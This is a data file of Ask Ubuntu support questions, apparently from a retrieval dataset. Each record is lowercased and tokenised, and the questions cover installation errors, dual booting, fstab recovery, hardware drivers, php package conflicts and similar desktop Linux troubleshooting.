760 ] : unknown command complete for opcode 19 dec 14 15:57:20 homebase bluetoothd [ 760 ] : adapter /org/bluez/760/hci0 has been enabled dec 14 16:24:27 homebase bluetoothd [ 760 ] : discovery session 0x7f5ac1149550 with :1.78 activated dec 14 16:25:15 homebase bluetoothd [ 760 ] : stopping discovery dec 14 16:25:25 homebase bluetoothd [ 760 ] : stopping discovery dec 14 16:25:26 homebase bluetoothd [ 760 ] : stopping discovery dec 14 16:25:27 homebase bluetoothd [ 760 ] : badly formated or unrecognized command : at+csrsf=1,1,1,1,1,7 dec 14 17:18:51 homebase bluetoothd [ 764 ] : bluetooth daemon 4.101 dec 14 17:18:51 homebase bluetoothd [ 764 ] : starting sdp server dec 14 17:18:51 homebase bluetoothd [ 764 ] : dis can not start : gatt is disabled dec 14 17:18:51 homebase bluetoothd [ 764 ] : failed to init deviceinfo plugin dec 14 17:18:51 homebase bluetoothd [ 764 ] : failed to init proximity plugin dec 14 17:18:51 homebase bluetoothd [ 764 ] : failed to init time plugin dec 14 17:18:51 homebase bluetoothd [ 764 ] : failed to init alert plugin dec 14 17:18:51 homebase bluetoothd [ 764 ] : failed to init thermometer plugin dec 14 17:18:52 homebase bluetoothd [ 764 ] : failed to init gatt_example plugin dec 14 17:18:52 homebase bluetoothd [ 764 ] : bluetooth management interface initialized dec 14 17:18:52 homebase bluetoothd [ 764 ] : unknown command complete for opcode 19 dec 14 17:18:52 homebase bluetoothd [ 764 ] : adapter /org/bluez/764/hci0 has been enabled dec 14 17:21:06 homebase bluetoothd [ 764 ] : unable to get service record : host is down ( 112 ) dec 14 17:21:20 homebase bluetoothd [ 764 ] : badly formated or unrecognized command : at+csrsf=1,1,1,1,1,7 dec 14 18:10:45 homebase bluetoothd [ 764 ] : badly formated or unrecognized command : at+csrsf=1,1,1,1,1,7 i have included output from pulseaudio -vvvv on pastebin , and this portion looks like it might be an issue : e : [ pulseaudio ] socket-server.c : bind ( ) : address already in use e : [ pulseaudio ] module.c : failed to load module `` module-cli-protocol-unix '' ( argument : `` '' ) : initialization failed . i can run pavucontrol without issue , so i assumed that means my pulseaudio server was running , however , when i run bt-autoconnect at the command line , i get this output : bt-autoconnect 1.0.1 scanning : auto unable to run pulseaudio cli failure : module initialization failed pulseaudio module-switch-on-connect loaded
390628	i get this error while installing or removing any software from ubuntu 12.04.3	while installing or removing any software i get this message on ubuntu 12.04.3 can any body help .. installarchives ( ) failed : selecting previously unselected package language-pack-kde-en-base . ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libelf1 ' : is a directory error in function :
390629	unable to dual boot ubuntu with windows 8	i already have windows 8 installed in c drive of my laptop , am trying to install ubuntu in d or e drive , it is showing as unable to mount those drives , how to install ubuntu into d or e drive with out deleting or formatting windows8 . please help me thank you . my laptop details : hp pavilion g6 . should i do any settings in boot-manager ?
390630	apt-get upgrade not to replace the local copy	there is some problem with the xmlcopyeditor in the ubuntu 12.04 repository and it does n't start . details and the workaround is mentioned here . the package has to be built and the installed as below . this works perfectly fine . mkdir ~/compilexmlcopyeditor & & cd ~/compilexmlcopyeditor sudo apt-get purge xmlcopyeditor sudo apt-get build-dep xmlcopyeditor sudo apt-get source xmlcopyeditor cd xmlcopyeditor-1.2.0.6 sudo dpkg-buildpackage -rfakeroot -us -b cd .. sudo dpkg -i *.deb but , when i run the below command the xmlcopyeditor from repository replaces the local one and xmlcopyeditor does n't work anymore . how to get around this problem ? sudo apt-get update ; sudo apt-get -- yes dist-upgrade ; sudo apt-get clean
390631	how to rename file names with spaces in a shell command line script	i am trying to rename all files in a folder replacing underscores with spaces . i.e . this_is_a_test -- > this is a test but somehow i 'm messing up the quoting > for file in * ; do echo mv -v $ file $ ( echo $ file | sed 's/_/\\ /g ' ) ; done mv -v this_is_a_test this\ is\ a\ test that looks ok , but if i remove the 'echo ' mv complains as if the backslashes were removed > for file in * ; do mv -v $ file $ ( echo $ file | sed 's/_/\\ /g ' ) ; done mv : target âtestâ is not a directory can someone point out the error of my ways ?
390634	unable to disable all acpi events relating to lid	i want to disable all lid processes because sometimes my thinkpads can not wake from a blank screen after having lid closed . i have commented out everything in /etc/acpi/events/lidbtn but still the screen goes blank when lid is closed for some reasons . list of all events in /etc/acpi/events/ ac asus-brightness-down asus-brightness-up asus-f8sv-touchpad asus-keyboard-backlight-down asus-keyboard-backlight-up asus-media-eject asus-rotate asus-touchpad asus-video asus-wireless-off asus-wireless-on battery ibm-wireless lenovo-touchpad lenovo-touchpad2 lenovo-undock lidbtn lidswitch lidswitch.save panasonic-lockbtn powerbtn sleepbtn thinkpad-cmos tosh-battery tosh-hibernate tosh-ibutton tosh-lock tosh-mail tosh-media tosh-next tosh-playac asus-brightness-down asus-brightness-up asus-f8sv-touchpad asus-keyboard-backlight-down asus-keyboard-backlight-up asus-media-eject asus-rotate asus-touchpad asus-video asus-wireless-off asus-wireless-on battery ibm-wireless lenovo-touchpad lenovo-touchpad2 lenovo-undock lidbtn panasonic-lockbtn powerbtn sleepbtn thinkpad-cmos tosh-battery tosh-hibernate tosh-ibutton tosh-lock tosh-mail tosh-media tosh-next tosh-play tosh-prev tosh-stop tosh-wireless tosh-www videobtn tosh-prev tosh-stop tosh-wireless tosh-www videobtn this question has been asked here , but wrongly marked as a duplicate . i have tried all the other suggested way to `` do nothing '' when lid closes but none works . hence i need to disable all acpi events like this .
390637	black screen while installing kubuntu	i 'm trying install kubuntu 13.10 using usb flash . but after selecting try kubuntu it hangs with black screen . i also tried xubuntu 13.10 and mint 16 cinnamon but result the same . please give advice . hardware : i7 4770k , 8gb ram , geforce gtx 780 .
390642	is there a guide to install ubuntu	is there an idiots guide available that can take me through installing ubuntu onto my windows 8 laptop right from the start i.e . setting up my flash drive , fat32 , etc please ?
390644	bluetooth keyboard prints wrong symbols , and does n't recognize - , p , [ , 0 ( thinkpad compact bluetooth keyboard )	i connect ( using console approach , gui does n't work ) `` thinkpad compact bluetooth keyboard '' ( us layout ) to thinkpad t420 . trackpoint on this external keyboard and most of the buttons work well , except - , p , 0 , [ not recognized at all , and pressing / outputs a sequence smth like `` bn/ '' . sometimes , if press p and some other symbols , then p is also printed . here is the output of xinput -list ( notice that there is no second keyboard , but there is a new slave pointer -- it is marked with ** below ) : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=14 [ slave pointer ( 2 ) ] ⎜ ↳ **thinkpad compact bluetooth keyboard with trackpoint id=15 [ slave pointer ( 2 ) ] ** ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ integrated camera id=10 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] so far : tried changing layout ( via keyboard layout settings ) , but no luck . tried showkey -- scancodes on that problematic symbols : returns nothing ! if we can not get even scancodes -- does it mean no chance to get them working ? ( i mean no `` easy '' way , writing a driver is not considered . ) any ideas ? ( running ubuntu 12.04 ) this question is related ( about need to press fn to make work f1-f12 ) , but also not answered .
390647	help with using nepali unicode keyboard layout ( romanized ) and language support !	how do i type क्ष , त्र , ज्ञ , etc . with nepali keyboard layout enabled in ubuntu ? how do i localize my system to use nepali language and keyboard ? देवनागरी यूनिकोड
390652	silverlight installed but does n't show on screen	i am trying to install the following on my laptop http : //www.stroma.com/certification/software/rsap-plus-software/rsap-plus-epc-module i have installed silverlight as a plug in but nothing happens , then a moonlight box appears with a bit of code in the ocrner of the screen and i get the following error message : source : http : //www.stromamembers.net/downloads/rsap/clientbin/rsap.xap width : 1317px height : 647px background : # ffffffff runtimeversion : 5.0.61118.0 windowless : no maxframerate : 60 codecs : none build configuration : debug , sanity checks at this rate i am going to have to go and buy a windows pc as i need this software for work so any help would be marvelous .
390653	how to install adbbrowser ?	so i downloaded tar.gz file , extracted , and i got adbbroswer file . how can i install this file on ubuntu 13.10 ? ./configure does not work . thank you .
390654	( initramfs ) unable to find a medium containing a live file system . -- -	trying to install ubuntu 12.04.3 onto my sony vaio laptop , installation runs after reboot then i am presented with -- - : ( initramfs ) unable to find a medium containing a live file system . i am trying to install via iso on my usb ... what am i doing wrong ? please help . thanking you in advance
390659	ubuntu 13.10 wifi internet access only after windows boot or ethernet connection	i have a dual boot ubuntu 13.10 installation on a windows 8.1 machine . after i log into windows and then into ubuntu internet access works on wifi . if i restart and log straight into ubuntu wifi internet access does not work . in such instances if i make a wired connection and then try on wifi internet access starts working . my pc has an atheros 9458 wifi card . the wifi connection connects always but wifi internet access works only after successful internet access by some other means - either windows log in or wired connection .
390660	qml ubuntu sdk : how to insert video element	hello everybody ! i am learning qml and using the ubuntu sdk tool in addition to qml elements . i saw on some sites that you can insert videos with the video element by importing qt 4.7 and qtmultimediakit 1.1 . but i have an error by compiling the project ( it 's a tabbed touch ui project ) : ( file path ) /presentation1.qml:44 type backbuttontab unavailable ( file path ) /ui/backbuttontab.qml:4 module `` qt '' is not installed ( file path ) /ui/backbuttontab.qml:5 module `` qtmultimediakit '' is not installed ( file path ) /ui/backbuttontab.qml:4 module `` qt '' is not installed ( file path ) ui/backbuttontab.qml:5 module `` qtmultimediakit '' is not installed /usr/lib/x86_64-linux-gnu/qt5/bin/qmlscene exited with code 255 i thought about adding qt 4.7 and qtmultimediakit 1.1 in the .qmlproject but it does n't change anything the message tells me that i have to install qtmultimediakit and qt , but i do n't know how to do it . ( i 've got the same problem with 3d elements by importing qt3d 1.0 or qt.labs.threed 1.0 - > what 's the difference between qt3d 1.0 and qt.labs.threed 1.0 ? ) i 'm using qt creator 2.8.1 based on qt 5.0.2 ( gcc 4.7.3 , 64 bit ) built on sep 16 2013 at 12:02:18 on ubuntu 13.10 thanks ! : 路 )
390667	please help rebuild my fstab ! ubuntu 12.04 lts	i 've accidentally deleted all the contents of my fstab file and i ca n't mount or unmount any of my drives . here is my blkid output : /dev/loop0 : uuid= '' 1d6980b1-174c-49d1-8a11-e95f1b26b4da '' type= '' ext3 '' /dev/sda1 : label= '' system reserved '' uuid= '' 6ed60ccfd60c998b '' type= '' ntfs '' /dev/sda2 : uuid= '' c480709d8070979e '' type= '' ntfs '' /dev/sda3 : label= '' new volume '' uuid= '' 5acab093cab06cbf '' type= '' ntfs '' /dev/sda5 : label= '' new volume '' uuid= '' f64e260a4e25c3e9 '' type= '' ntfs '' i think cat /etc/mtab output would also help : /dev/loop0 / ext3 rw 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 /dev/sda3 /host fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 0 0 gvfs-fuse-daemon /home/asim/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=asim 0 0 /dev/sda1 /media/system_reserved fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sda2 /media/sda2 fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 gvfs-fuse-daemon /root/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev 0 0 mount without mounting my drives : /dev/loop0 on / type ext3 ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda3 on /host type fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) gvfs-fuse-daemon on /home/asim/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=asim ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) mount output when all drives are mounted : /dev/loop0 on / type ext3 ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) /dev/sda3 on /host type fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) gvfs-fuse-daemon on /home/asim/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=asim ) gvfs-fuse-daemon on /root/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev ) /dev/sda1 on /media/system reserved type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda2 on /media/c480709d8070979e type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda5 on /media/new volume_ type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 )
390669	i cant install sleepyhead under ubuntu	i am trying to install sleepyhead following the tutorial http : //ubuntuforums.org/showthread.php ? p=11756055 # post11756055 but i cant compile the src code` horacio @ horacio-thinkpad-x201 : ~/sleepyhead $ make cd sleepyhead/ & & make -f makefile make [ 1 ] : se ingresa al directorio «/etc/home/horacio/sleepyhead/sleepyhead» g++ -c -pipe -o2 -wall -w -d_reentrant -dgit_branch=\ '' master\ '' -dgit_revision=\ '' 3b53d93\ '' -d_tty_posix_ -dqt_no_debug -dqt_webkit_lib -dqt_xml_lib -dqt_opengl_lib -dqt_gui_lib -dqt_network_lib -dqt_core_lib -dqt_shared -i/usr/share/qt4/mkspecs/linux-g++ -i . -i/usr/include/qt4/qtcore -i/usr/include/qt4/qtnetwork -i/usr/include/qt4/qtgui -i/usr/include/qt4/qtopengl -i/usr/include/qt4/qtxml -i/usr/include/qt4/qtwebkit -i/usr/include/qt4 -i/usr/local/include -i/usr/include -i/usr/x11r6/include -i . -i . -o main.o main.cpp in file included from mainwindow.h:19:0 , from main.cpp:24 : oximetry.h:17:28 : fatal error : qextserialport.h : no existe el archivo o el directorio # include < qextserialport.h > ^ compilation terminated . make [ 1 ] : *** [ main.o ] error 1 make [ 1 ] : se sale del directorio «/etc/home/horacio/sleepyhead/sleepyhead» make : *** [ sub-sleepyhead-make_default-ordered ] error 2 horacio @ horacio-thinkpad-x201 : ~/sleepyhead thanks in advance
390671	does this work in ubuntu correctly - or is there missing something ?	this ( gawky ) question is concerning command dd : dd if=/dev/dvd of=whatever.iso seems not to work ... and then output follows like : could not open /dev/dvd - file or directory not found is here usage of dd incomplete or not exactly enough - or path simply not correct ? i wonder about that ( this usb-dvd-burner ) is not written in /etc/fstab - but wodim -v -eject whatever.iso has no trouble to burn iso-images contrary to command dd ?
390672	settings are not saved in hp pavilion g4 1201tx notebook	i have a hp pavilion g4 1201tx notebook pc . when i set a wallpaper and restart the machine the wallpaper that i set has gone , and the default desktop is available . whatever the changes i do in the ui s are gone when i come back.i 'm using ubuntu 13.10,64 bit , with dual boot with windows 7 . please help . thanks for your help .
390673	what is the role of the following files during boot from live usb ?	/boot/vmlinuz-3.8.0-29-generic /boot/vmlinuz-3.8.0-29-generic.efi.signed /usr/lib/linux/vmlinuz-3.8.0-29-generic.efi.signature /casper/vmlinuz.efi /cdrom/preseed/ubuntu.seed /casper/initrd.lz /efi/boot/bootx64.efi /efi/boot/grubx64.efi
390674	how to reduce internet usage for updating ubuntu ?	for better performance ubuntu needs updating . but it consumes internet usage too much . a solution is needed for this . it will be helpful to those who are unaware of the changes/description given in 'update manager ' . unwanted updating is useless .
390680	why does chromium open google chrome guide and store ?	i installed chromium and noticed that some menu and functions , like the guide , the web store and the settings windows are `` contaminated '' by google chrome'w `` world '' . for example , a click on the guide menu item opens https : //support.google.com/chrome and a click on the blue chromium web store icon opens https : //support.google.com/chrome . is this the way it should work ? or this `` contamination '' is due to the fact that before installing chromium i started the google chrome installing procedure even if i actually did n't install it ? ( i downloaded from google 's webpages the deb file only - using firefox - then i changed my mind and installed chromium ) thanks .
390681	how to display last error message after automatic shutdown	my computer is shutting down automaticly using the bitcoin client during catching up with the blockchain stage . sometimes after hours and sometimes after 30 minutes . it could be heat related . a second before shutting down , i see error messages but it shuts down to fast to be able to read . this has happened previously with other programs such as video format conversion programs . what command line should i use to find the error log ? thanks !
390683	what to do when my scope does not fit into any master scope ?	i have created my own unity scope following this tutorial which works very well . for now i have added it to the info master scope , however it does not really fit there or in any other master scope . do i need to create my own master scope ? if yes how do i go about this ?
390684	various search path settings in gnome terminal missing default folders	i 'm running ubuntu 12.04 lts . when i open a gnome terminal ( ctrl+alt+t ) the path settings for things like library_path , c_include_path , etc . are all set to just : /usr/local/lib or the like . the default paths are not included . all is well if i su -l to myself . i 've looked in /etc/profile , ~/.bashrc , ~/.bash_bashrc and see nothing that would cause this . i set `` run command as login shell '' in the terminal 's profile ... still no change . any hints on how to sort this out so that the various paths are set to the defaults ? gene
390686	how to set up bulk email on ubuntu desktop ?	i am using ubuntu 13.10 . i am connected to a dynamic ip-based commercial internet connection . i want to set up a bulk email setup like interspire . is it possible and what are the key pointers which may be used to implement the same ? thanks in advance
390692	handle plasma panel intersections	i 'm playing around with kubuntu a bit and am struggling with the following : i 've got a top plasma panel which stays there every time and a left-side panel with auto-hide . when moving the mouse to the left screen edge , the panel appears as intended , but in the top left corner it lies over the top panel . i 'd like to have it the other way round , s o the top panel should cover up the side panel . how can i achieve this ?
390693	time of bringing up or down an interface	how can i write the time , in the following format [ dd-mm-yy/hh : mm : ss ] in a file when a interface was brought up or down ? i want to store data like this , [ 12-12-12/10:21:00 ] interface up [ 14-12-12/19:11:14 ] interface down
390697	how to detect if 32 or 64 bit jdk is installed ?	how can i detect if 32bit or 64bit java jdk ( sdk ) has been installed on my machine ? i am running a 64bit ubuntu .
390698	how to use ubuntu to recover data from an old windows xp laptop with a broken hard drive ?	i want to transfer data from an old laptop in which the hard drive does n't work . i have : old laptop = 7yr old toshiba laptop - windows xp , was fast , hard drive does n't work newer laptop = 3yr olf toshiba laptop - windows 7 , quite slow , works . sata/usb converter = external 2.5 '' sata hdd usb connector planning on getting : new drive = new 80gb+ 2.5 '' sata hdd hard drive the sata/usb converter says it 's compatible with win2000/vista/7/8 but not xp ! is it feasible to download ubuntu to the new drive via the new laptop & the sata/usb converter then fit that drive into the old laptop and boot up with ubuntu , then plug the sata/usb converter with the broken hard drive , into the old laptop and transfer `` all '' the data including winxp from the broken hard drive to the new drive ? or alternatively , download ubuntu to the new drive via the newer laptop & the sata/usb converter then use that to boot up that newer laptop with ubuntu , then replace the new drive with the broken hard drive from the old laptop and transfer `` all '' the data including winxp from the broken hard drive to the hard drive within the newer laptop then replace the broken hard drive with the new drive and transfer the data to it via the sata/usb converter , then fit the new drive into the old laptop ? firstly , sorry for not making the question easy to understand , i did read and edit it many times , and did consider numbering the broken drive , before posting . i guess it was the reading many times that made it clear in my mind . secondly i 'd be interested to know if any others find that win7 is slower than winxp . the broken hard drive has the famous âclick noise of deathâ including when it is fitted into the sata/usb converter via the newer laptop . i doubt if that hard drive still works . wilf - when you refer to `` disk '' i guess you mean to acquire a blank cd disk . i have never done that before so would be curious if there is anything i need to know in advance . by the way i found ubuntu from http : //geekyprojects.com/storage/how-to-recover-data-even-when-hard-drive-is-damaged/ i searched for operating instructions for ubuntu rescue remix and the best place i 've found is http : //www.geekyprojects.com/storage/how-to-recover-data-even-when-hard-drive-is-damaged/
390699	how to get the list of dash search plugins ( scopes ) in command line ?	i am going to disable all or some of dash search plugins ( scopes ) . i can do it in dash gui one by one ( see http : //askubuntu.com/a/355523/103599 ) but it seems to me unpractical as there are 56 plugins installed now . therefore i am going to disable them from command line like this : gsettings set com.canonical.unity.lenses disabled-scopes `` [ 'more_suggestions-amazon.scope ' , 'more_suggestions-u1ms.scope ' , 'more_suggestions-populartracks.scope ' , 'music-musicstore.scope ' , 'more_suggestions-ebay.scope ' , 'more_suggestions-ubuntushop.scope ' , 'more_suggestions-skimlinks.scope ' ] '' but for this i need to know the names of all scopes , not only amazon , ebay , etc ... how can i do it ?
390700	does anybody know of an easy way to connect to an airport extreme device ?	i am just curious , because in 12.04 i was n't able to , but in 13.10 i hope its possible ? i think i have tried a generic airport utility , but i 'm sure i had issues with it . any help would be greatly appreciated . thanks in advance
390704	when install tablet wacom , with command depmod -a message permission denied appears	i 'm on ubuntu 12.04 i try to install the pilot of my tablet wacom intuos cth480 with this tutorial : title input-wacom by the end , when i type this command : depmod -a this message appears : fatal : could not open /lib/modules/3.2.0-57-generic/modules.dep.temp for writing : permission denied what to do ? thanks
390706	issue with installing php 5.4.9 with apt	i used a script for downgrade php from php 5.4 to php 5.3 it workded.now i want to upgrade my php to php 5.4.9 with synaptic form package- > force version when i want to apply the chanes it gives me this error : could not apply changes ! fix broken packages first . i tried every thing form removing package lists to using sudo apt-get -f install , sudo dpkg -- configure -a , sudo apt-get clean , sudo apt-get auto-remove , sudo apt-get update etc.. finally when i used sudo apt-get install php5=5.4.9-4ubuntu2 it generated this error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or libapache2-mod-php5filter ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-cgi ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed or php5-fpm ( > = 5.4.9-4ubuntu2 ) but it is not going to be installed depends : php5-common ( > = 5.4.9-4ubuntu2 ) but 5.3.10-1ubuntu3 is to be installed w : duplicate sources.list entry http : //bg.archive.ubuntu.com/ubuntu/ precise/main amd64 packages ( /var/lib/apt/lists/bg.archive.ubuntu.com_ubuntu_dists_precise_main_binary-amd64_packages ) w : duplicate sources.list entry http : //bg.archive.ubuntu.com/ubuntu/ precise/restricted amd64 packages ( /var/lib/apt/lists/bg.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary- amd64_packages ) i 'm using ubuntu 13.04 and i ca n't reinstall ubuntu again because internet band-width is very expensive in my country so any help would be really appreciated .
390715	what would be the most efficient version of ubuntu to install that would outperform windows xp in speed and overall efficiency ?	what would be the leanest , most efficient version of ubuntu to install ( dual boot ) on my acer aspire 1.6 amd turion with 1gb ddr2 memory ) that would outperform it 's dual boot companion , windows xp in speed and overall efficiency ? i thank you in advance for your anticipated assistance and cooperation with this request .
390717	`` no root file system is defined '' error on my new custom built pc	i finished the hardware of the pc about a week ago and i decided to try linux on it so i found a program that will extract ubuntu on to my flash drive , i extracted it and inserted my flash drive in the computer . bios then identifies it and i go into the installation menu , after a few slides it gets to the installation slide with partitions but does n't have anything on the partition chart . i ca n't press revert , edit , partition , or anything . i can only press install , back , or quit . when i press install it gives me a `` no root file system is defined '' error and i do n't know what to do after that . can someone please help me in this problem , i certainly do n't want windows and i 've never been a fan of it lol .
390718	folder disappears after renaming it to '' . *name ''	i just tried to install a theme for conky but when i follow the instructions and rename the folder ''conky '' to '' .conky '' it simply disappears . even if i turned on show hidden folders . where is the problem and how can i fix it ? thank you for your replies : )
390721	making webpy framework accessible from outside the local network	i am using ubuntu 12.04.03 . i have some basic experience with webpy and i had it working for my lan just by following the tutorial . the framework needs to be able to be used from outside the local network . i have difficulty seeing how to make the framework accessible from outside the lan . i tried opening a specific port ( with `` # iptables -a input -p tcp -d 0/0 -s 0/0 -- dport 8081 -j accept '' then i check : `` # netstat -ln | grep 8081 and i get : tcp 0 0 0.0.0.0:8081 0.0.0.0 : * listen '' ) and use `` python web_py_test.py my_ip:8081 '' without success . if i understand it at all , we can have a computer connected on a wifi with a non-static ip and there is a way to launch our webpy framework which can be accessible from the outside world . i am experimenting with the hello script : import web urls = ( '/ ( . * ) ' , 'hello' ) app = web.application ( urls , globals ( ) ) class hello : def get ( self , name ) : if not name : name = 'world' return 'hello , ' + name + ' ! ' if __name__ == `` __main__ '' : app.run ( ) ~ i observe that nothing is declared in the script about ips or ports .
390724	installing ubuntu partitions problem	i installed ubuntu 13.10 by replace os ( windows ) . now ubuntu is with total memory space . so i ca n't install another os . how it is done ?
390726	can not switch to hdmi output	when i installed ubuntu i had to disable my graphics card ( radeon 6570 ) and work off the integrated one because ubuntu did not have the proper drivers for the graphics card . when i installed ubuntu i downloaded the drivers and tried to use my radeon 6570 . the vga port works fine , but i ca n't use the hdmi port , and i ca n't find any options to change the video output from vga to hdmi . can someone help me out ? thanks !
390731	how to install antlworks 2.1 ?	i want to install antlworks 2.1 on an ubuntu machine , does not matter as a standalone app or as a netbeans 7.3 plugin .
390732	no boot menu selection	installation through wubi went fine as per description ( in the same partition as windows ) but when restarting , the computer never asks me to chose between ubuntu & windows my machine : pc xp sp3 - 1gb ram what did i miss there ? should i have formated the disk with 2 partitions , then reinstalled windows on the first then ubuntu on the second ? this is not even mentioned in the guide ! ! ! ! thks
390733	stop rendering a single color	how could i make my screen stop rendering a single color ( one of the base colors , let 's say red ) without touching any hardware ? i 'm running under ubuntu 13.04 . i 've looked on the xrandr help section but have n't found anything useful . any ideas ?
390734	volume low even at maximum	i have an asus ul20ft-a1 laptop whose sound at maximum is not high enough . i have to open the sound settings menu and go over the limitation to get a high enough level . any idea how i can fix this ?
390737	bitcoin is using +90 % cpu power using ubuntu 12.04 ?	i am using ubuntu 12.04 and bitcoin client v0.8.6.0-g03a7d67-beta and qt version 4.8.1 as the gui . my cpu is heating up and is automaticly shutting down after 30 minutes and sometimes after many hours . this is occurring both while synchronising with the block-chain or while reindexing the blocks on disk . after the cpu overheating my laptop ( dell inspiron r15 ) switches off and has corrupted my sync . other users have mentioned to start by typing in terminal bitcoin-qt -reindex . at the the end of the index around week17 my cpu overheats again . reading around i found topics about switching off the `` generate bitcoin '' option inside the bitcoin.conf file but on my ubuntu ( including hidden files ) i can not find that file . any tips or help on this overheating issue ? i have also posted this on bitcoin stackexchange .
390739	dual boot : windows 8 is fine , ubuntu is fine , but will only boot when dvd is in the disk drive	i have a new computer with windows 8.1 and have gone to work at dual-booting with ubuntu 12.04.3 . i can boot windows 8 from the grub menu just fine , and ubuntu appears on the menu and i can select it , but it will remain on a blank screen , same color as the grub menu , and does nothing , no error message . however , if i put my ubuntu dvd in the disk drive before starting up , i can select ubuntu from the grub menu and it always starts up perfectly . one thing i noticed is that if the disk is not in the drive , i see a little message `` efi disk read error '' appear several times just before the grub menu is displayed . the message does not appear if the disk has been inserted . could someone let me know what 's going on ? additional details : just following my ubuntu install , the initial problem had been that windows was not recognized and did n't show up in grub . i ran boot-repair ( results ) from my ubuntu installation ( bios would not boot from the optical drive after installing ubuntu ) . following this , it appeared that everything was fine - i could boot windows and ubuntu , and i could n't tell you whether it was because a disk was in or not . i did n't take note of this at the time . after this i did some various installing of software on windows , and also got the grub menu customizer on ubuntu to shift around my menu options , and shove some ones i do n't plan to use much into folders . but that 's all . and this morning i noticed that i could not boot ubuntu unless the disk was in the drive .
390740	dj : pioneer ddj-t1 with traktor in ubuntu by wine	i have a friend who wants to move to ubuntu . she is a dj and she would like to use her pioneer ddj-t1 with traktor by wine . she has run traktor without problem . but the problem is that traktor or ubuntu does n't detect the pioneer . anyone knows about that ?
390741	recover files from external hdd to dvd+rw using photorec	so i have a 1 tb external hard drive which i accidentally formatted back when i was using windows 8 . i moved to ubuntu afterwards and have n't touched the external hdd for a few days . i now want to use photorec to recover my files . my only problem is that i have no storage large enough except for a dvd+rw ( internal drive 500g ) . i already got photorec up and running . i am just stuck at the final option , where to save the recovered files . i ca n't find a way to use the dvd+rw as a writable drive . questions : where is the dvd directory in the file system ? how do i make the dvd function like a flash drive ?
390743	notifyosd does not work	somehow my notiyosd unter 12.04. does not work . notify-send `` test '' `` test '' produces : notify-send -i /usr/share/icons/gnome/32x32/status/dialog-warning.png `` test '' `` test '' produces : if i use my volume hotkey , i get this : but i expect this : any ideas ?
